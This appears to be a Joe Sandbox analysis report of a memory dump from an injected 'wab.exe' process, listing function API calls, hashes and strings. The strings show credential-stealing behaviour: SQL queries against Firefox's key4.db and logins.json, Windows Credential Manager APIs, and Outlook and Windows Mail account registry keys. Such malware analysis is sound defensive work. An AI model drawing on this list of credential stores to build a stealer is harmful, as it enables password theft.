                  • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                  • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                  • API String ID: 231171946-2189169393
                  • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                  • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                  • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                  • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$memsetsprintf$_mbscpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 633282248-1996832678
                  • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                  • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                  APIs
                  Strings
                  • , xrefs: 00406834
                  • key4.db, xrefs: 00406756
                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp$memsetstrlen
                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                  • API String ID: 3614188050-3983245814
                  • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                  • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                  • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                  • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                  • API String ID: 710961058-601624466
                  • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                  • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                  • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                  • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: sprintf$memset$_mbscpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 3402215030-3842416460
                  • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                  • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                  • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                  • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                  APIs
                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                  • strlen.MSVCRT ref: 0040F139
                  • strlen.MSVCRT ref: 0040F147
                  • memset.MSVCRT ref: 0040F187
                  • strlen.MSVCRT ref: 0040F196
                  • strlen.MSVCRT ref: 0040F1A4
                  • memset.MSVCRT ref: 0040F1EA
                  • strlen.MSVCRT ref: 0040F1F9
                  • strlen.MSVCRT ref: 0040F207
                  • _strcmpi.MSVCRT ref: 0040F2B2
                  • _mbscpy.MSVCRT ref: 0040F2CD
                  • _mbscpy.MSVCRT ref: 0040F30E
                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                  • String ID: logins.json$none$signons.sqlite$signons.txt
                  • API String ID: 1613542760-3138536805
                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                  • API String ID: 1012775001-1343505058
                  • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                  • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                  APIs
                  • memset.MSVCRT ref: 00444612
                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                  • strlen.MSVCRT ref: 0044462E
                  • memset.MSVCRT ref: 00444668
                  • memset.MSVCRT ref: 0044467C
                  • memset.MSVCRT ref: 00444690
                  • memset.MSVCRT ref: 004446B6
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                    • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                  • memcpy.MSVCRT ref: 004446ED
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                  • memcpy.MSVCRT ref: 00444729
                  • memcpy.MSVCRT ref: 0044473B
                  • _mbscpy.MSVCRT ref: 00444812
                  • memcpy.MSVCRT ref: 00444843
                  • memcpy.MSVCRT ref: 00444855
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset$strlen$_mbscpy
                  • String ID: salu
                  • API String ID: 3691931180-4177317985
                  • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                  • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                  • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                  • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                  APIs
                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                  • API String ID: 2449869053-232097475
                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                  APIs
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • strlen.MSVCRT ref: 00443AD2
                  • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                  • memset.MSVCRT ref: 00443B2E
                  • memset.MSVCRT ref: 00443B4B
                  • _mbscpy.MSVCRT ref: 00443B79
                  • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                  • LocalFree.KERNEL32(?), ref: 00443C23
                  • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                    • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                  Strings
                  • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                  • Software\Microsoft\Windows Mail, xrefs: 00443B61
                  • Salt, xrefs: 00443BA7
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                  • API String ID: 665470638-2687544566
                  • Opcode ID: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                  • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                  • Opcode Fuzzy Hash: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                  • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                  APIs
                  • sprintf.MSVCRT ref: 0040957B
                  • LoadMenuA.USER32(?,?), ref: 00409589
                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                  • DestroyMenu.USER32(00000000), ref: 004095A7
                  • sprintf.MSVCRT ref: 004095EB
                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                  • memset.MSVCRT ref: 0040961C
                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                  • DestroyWindow.USER32(00000000), ref: 0040965C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                  • String ID: caption$dialog_%d$menu_%d
                  • API String ID: 3259144588-3822380221
                  • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                  • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                  • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                  • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                  APIs
                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                  • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                  • API String ID: 2449869053-4258758744
                  • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                  • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                  • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                  • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                  APIs
                  • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                  • memset.MSVCRT ref: 0040F84A
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                  • LocalFree.KERNEL32(?), ref: 0040F92C
                  • RegCloseKey.ADVAPI32(?), ref: 0040F937
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                  • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                  • String ID: Creds$ps:password
                  • API String ID: 551151806-1872227768
                  • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                  • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                  • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                  • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                  APIs
                  • wcsstr.MSVCRT ref: 0040426A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                  • _mbscpy.MSVCRT ref: 004042D5
                  • _mbscpy.MSVCRT ref: 004042E8
                  • strchr.MSVCRT ref: 004042F6
                  • strlen.MSVCRT ref: 0040430A
                  • sprintf.MSVCRT ref: 0040432B
                  • strchr.MSVCRT ref: 0040433C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                  • String ID: %s@gmail.com$www.google.com
                  • API String ID: 3866421160-4070641962
                  • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                  • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                  APIs
                  • _mbscpy.MSVCRT ref: 00409749
                  • _mbscpy.MSVCRT ref: 00409759
                    • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                    • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                    • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                  • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                  • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                  • _mbscpy.MSVCRT ref: 004097A1
                  • memset.MSVCRT ref: 004097BD
                  • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                  • String ID: TranslatorName$TranslatorURL$general$strings
                  • API String ID: 1035899707-3647959541
                  • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                  • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                  • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                  • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                  APIs
                  • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                  • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                  • SelectObject.GDI32(?,?), ref: 0040CACC
                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                  • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                    • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                    • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                    • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                  • LoadCursorA.USER32(00000067), ref: 0040CB2E
                  • SetCursor.USER32(00000000), ref: 0040CB35
                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                  • SetFocus.USER32(?), ref: 0040CB92
                  • SetFocus.USER32(?), ref: 0040CC0B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                  • String ID:
                  • API String ID: 1416211542-0
                  • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                  • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                  • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                  • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  • API String ID: 2360744853-2229823034
                  • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                  • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                  APIs
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00402C9D
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • memset.MSVCRT ref: 00402CF7
                  • sprintf.MSVCRT ref: 00402D10
                  • sprintf.MSVCRT ref: 00402D4E
                    • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                    • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Closememset$sprintf$EnumOpen
                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                  • API String ID: 1831126014-3814494228
                  • Opcode ID: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                  • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                  • Opcode Fuzzy Hash: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                  • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                  APIs
                  • strchr.MSVCRT ref: 004100E4
                  • _mbscpy.MSVCRT ref: 004100F2
                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                  • _mbscpy.MSVCRT ref: 00410142
                  • _mbscat.MSVCRT ref: 0041014D
                  • memset.MSVCRT ref: 00410129
                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                  • memset.MSVCRT ref: 00410171
                  • memcpy.MSVCRT ref: 0041018C
                  • _mbscat.MSVCRT ref: 00410197
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                  • String ID: \systemroot
                  • API String ID: 912701516-1821301763
                  • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                  • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$strlen
                  • String ID: -journal$-wal$immutable$nolock
                  • API String ID: 2619041689-3408036318
                  • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                  • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                  • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
